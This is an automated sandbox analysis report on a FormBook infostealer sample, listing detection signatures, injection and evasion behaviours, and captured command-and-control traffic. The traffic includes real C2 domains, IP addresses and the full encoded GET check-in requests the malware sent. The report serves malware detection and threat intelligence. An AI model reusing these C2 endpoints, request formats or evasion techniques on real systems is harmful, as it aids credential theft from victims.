Windows Analysis Report
SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe
Analysis ID:	1467140
MD5:	0d866e84b1b42f3b924d671db5b3b40e
SHA1:	8890d49ef3267c6c6697c0e56b85ce118e0f7eef
SHA256:	74f7be7a0e6e10f0209d700876ab03eb9d37cdcab79c0def5d536eb8accbf49f
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected FormBook

Yara detected UAC Bypass using CMSTP

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Disables UAC (registry)

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for available system drives (often done to infect USB drives)

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://www.vertilehub.xyz/ei4t/?3pSl=bXiTJHhxyN&Z6ZTG=vJK+R49o60hMb5R0zuW0LjMDSBoWblw/xm7bGUo972WEnNUAqilJR4ikt7uwBrcRV8UZThTaEWZ7S+DdGKZTmgrpJBBQs9ifJOYm4nfBSZlzTv8zXZPL/ZPwonFSFx1LsUa4ZMM=	Avira URL Cloud: Label: malware
Source: http://www.vertilehub.xyz/ei4t/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe

ReversingLabs: Detection: 21%

Yara detected FormBook

Source: Yara match	File source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.3944875828.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2322232096.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3948817261.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3945190684.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3945837611.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2322275427.00000000040C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe PID: 1512, type: MEMORYSTR

Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER9BF4.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF246C0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.PDB source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER9BF4.tmp.dmp.9.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER9BF4.tmp.dmp.9.dr
Source:	Binary string: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.PDBH source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2453568054.000000AA40102000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: wmplayer.exe, 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2230114991.00000000030F5000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2228408124.0000000002F48000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.2321922412.000000000343E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000D.00000003.2321954921.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000D.00000003.2323720085.000000000338F000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: sc.pdbUGP source: wmplayer.exe, 00000006.00000002.2321810526.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3944318113.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: WER9BF4.tmp.dmp.9.dr
Source:	Binary string: wntdll.pdb source: wmplayer.exe, wmplayer.exe, 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2230114991.00000000030F5000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2228408124.0000000002F48000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.2321922412.000000000343E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, sc.exe, 0000000D.00000003.2321954921.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000D.00000003.2323720085.000000000338F000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.PDB source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2453568054.000000AA40102000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER9BF4.tmp.dmp.9.dr
Source:	Binary string: sc.pdb source: wmplayer.exe, 00000006.00000002.2321810526.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3944318113.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER9BF4.tmp.dmp.9.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER9BF4.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbCoe source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: WER9BF4.tmp.dmp.9.dr
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A0A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER9BF4.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdb source: WER9BF4.tmp.dmp.9.dr
Source:	Binary string: pC:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.PDB source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2453568054.000000AA40102000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER9BF4.tmp.dmp.9.dr
Source:	Binary string: mscorlib.pdb` source: WER9BF4.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A114000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A114000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp, WER9BF4.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb.0e source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF246C0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER9BF4.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbx. source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A114000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3942485337.0000000000A7E000.00000002.00000001.01000000.00000009.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000000.2386545627.0000000000A7E000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: System.Drawing.pdb source: WER9BF4.tmp.dmp.9.dr
Source:	Binary string: mscorlib.ni.pdb source: WER9BF4.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbPROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocaQ, source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A114000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER9BF4.tmp.dmp.9.dr
Source:	Binary string: Microsoft.VisualBasic.pdb- source: WER9BF4.tmp.dmp.9.dr
Source:	Binary string: wmplayer.pdbGCTL source: sc.exe, 0000000D.00000002.3946994371.0000000003B6C000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 0000000D.00000002.3942849584.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3946036134.000000000339C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2615659691.00000000191BC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: wmplayer.pdb source: sc.exe, 0000000D.00000002.3946994371.0000000003B6C000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 0000000D.00000002.3942849584.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3946036134.000000000339C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2615659691.00000000191BC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER9BF4.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER9BF4.tmp.dmp.9.dr

Checks for available system drives (often done to infect USB drives)

Source: C:\Windows\System32\unregmp2.exe	File opened: z:
Source: C:\Windows\System32\unregmp2.exe	File opened: x:
Source: C:\Windows\System32\unregmp2.exe	File opened: v:
Source: C:\Windows\System32\unregmp2.exe	File opened: t:
Source: C:\Windows\System32\unregmp2.exe	File opened: r:
Source: C:\Windows\System32\unregmp2.exe	File opened: p:
Source: C:\Windows\System32\unregmp2.exe	File opened: n:
Source: C:\Windows\System32\unregmp2.exe	File opened: l:
Source: C:\Windows\System32\unregmp2.exe	File opened: j:
Source: C:\Windows\System32\unregmp2.exe	File opened: h:
Source: C:\Windows\System32\unregmp2.exe	File opened: f:
Source: C:\Windows\System32\unregmp2.exe	File opened: b:
Source: C:\Windows\System32\unregmp2.exe	File opened: y:
Source: C:\Windows\System32\unregmp2.exe	File opened: w:
Source: C:\Windows\System32\unregmp2.exe	File opened: u:
Source: C:\Windows\System32\unregmp2.exe	File opened: s:
Source: C:\Windows\System32\unregmp2.exe	File opened: q:
Source: C:\Windows\System32\unregmp2.exe	File opened: o:
Source: C:\Windows\System32\unregmp2.exe	File opened: m:
Source: C:\Windows\System32\unregmp2.exe	File opened: k:
Source: C:\Windows\System32\unregmp2.exe	File opened: i:
Source: C:\Windows\System32\unregmp2.exe	File opened: g:
Source: C:\Windows\System32\unregmp2.exe	File opened: e:
Source: C:\Windows\System32\unregmp2.exe	File opened: c:
Source: C:\Windows\System32\unregmp2.exe	File opened: a:

Source: C:\Windows\SysWOW64\sc.exe

Code function: 13_2_02E1BCA0 FindFirstFileW,FindNextFileW,FindClose,

13_2_02E1BCA0

Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\sc.exe	Code function: 4x nop then xor eax, eax		13_2_02E09710
Source: C:\Windows\SysWOW64\sc.exe	Code function: 4x nop then mov ebx, 00000004h		13_2_033B0541

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59401 -> 89.31.143.90:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59407 -> 81.88.48.71:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59408 -> 81.88.48.71:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59410 -> 81.88.48.71:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59411 -> 156.251.142.105:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59412 -> 156.251.142.105:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59414 -> 156.251.142.105:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59416 -> 81.88.57.70:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59417 -> 81.88.57.70:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59419 -> 81.88.57.70:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59420 -> 203.161.49.220:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59421 -> 203.161.49.220:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59423 -> 203.161.49.220:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59424 -> 152.32.156.214:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59426 -> 152.32.156.214:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59428 -> 152.32.156.214:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59429 -> 64.190.62.22:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59430 -> 64.190.62.22:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59432 -> 64.190.62.22:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59433 -> 23.105.172.12:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59434 -> 23.105.172.12:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59436 -> 23.105.172.12:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59437 -> 185.151.30.199:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59438 -> 185.151.30.199:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59440 -> 185.151.30.199:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59441 -> 142.250.185.211:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59442 -> 142.250.185.211:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59445 -> 142.250.185.211:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59446 -> 47.239.13.172:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59447 -> 47.239.13.172:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59449 -> 47.239.13.172:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59450 -> 47.239.13.172:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59451 -> 47.239.13.172:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59453 -> 47.239.13.172:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59454 -> 47.239.13.172:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59455 -> 47.239.13.172:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59457 -> 47.239.13.172:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59458 -> 46.235.40.27:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59459 -> 46.235.40.27:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59461 -> 46.235.40.27:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59462 -> 89.31.143.90:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.vertilehub.xyz

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 23.105.172.12 23.105.172.12
Source: Joe Sandbox View	IP Address: 64.190.62.22 64.190.62.22

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: LEASEWEB-USA-WDCUS LEASEWEB-USA-WDCUS
Source: Joe Sandbox View	ASN Name: NBS11696US NBS11696US
Source: Joe Sandbox View	ASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /obdd/?3pSl=bXiTJHhxyN&Z6ZTG=iAqH8h/tGKVhLv76hXtDkp/tsoNJZUwghhFRVhBlXKA5k0wUKDpGIsk5Z77aZpW07kzVnHl6/cD+xmMbGt3tKENSOXeInUOEjIwpy90PuGUlpE2byY+FLaYtfu+R+h2f+4odIwk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.le-kuk.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /utkc/?Z6ZTG=xUiyaqLJoScYwvSKxaGp/hpT2WjKlz4HgwmTPdW94fPPmC4rv/t3tHuSJrzPzR7paXxk8earaiLam3RcAVyJFQBqD9wWwb3EOl9ToIAQBz3Abx7ULfREDyg8fvDjES+swyckS94=&3pSl=bXiTJHhxyN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.limpiezasbarcelo.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /awbu/?3pSl=bXiTJHhxyN&Z6ZTG=tfMOGb5YbIlZgDy8Ct7zXIcDvsDfT/TzyUAekPS/3XIjjxWvcqryNCXIK4stFUxfS1vuJxAN6daHj1X4B8YBs4RT9ktx4jetcwfj0b5V53bLA3sBo/Tvu++c4r3yYfk5ffJC8L0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.top65s.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /hfmm/?Z6ZTG=NFJP1MENpWop4mQ2Zs5LCbA0YH8E+xFn0ZZfcGEEhmCw8vkYycZHoGwi7KU1tu5K8k8nV/m8HY5DGkDycaipo03uFrN3sKGd/4X9PAy/KU8mrpcfTGbb4advs0SPZoPYPk8rppw=&3pSl=bXiTJHhxyN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.videos60.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /ei4t/?3pSl=bXiTJHhxyN&Z6ZTG=vJK+R49o60hMb5R0zuW0LjMDSBoWblw/xm7bGUo972WEnNUAqilJR4ikt7uwBrcRV8UZThTaEWZ7S+DdGKZTmgrpJBBQs9ifJOYm4nfBSZlzTv8zXZPL/ZPwonFSFx1LsUa4ZMM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.vertilehub.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /wvfe/?3pSl=bXiTJHhxyN&Z6ZTG=9oDlrGBoczxc0gczmqK1qT+UWdDZ5zHLqosyG+84tRh7R4eQSXiPG8LnfVg9iGgF5+wWImCEQfufShLjWU3N10ZwNVybtIBwFMrSzRX1wq0uGk8UZr/5T8KnA73sbBy91RxM/wk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.xuzfceth.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
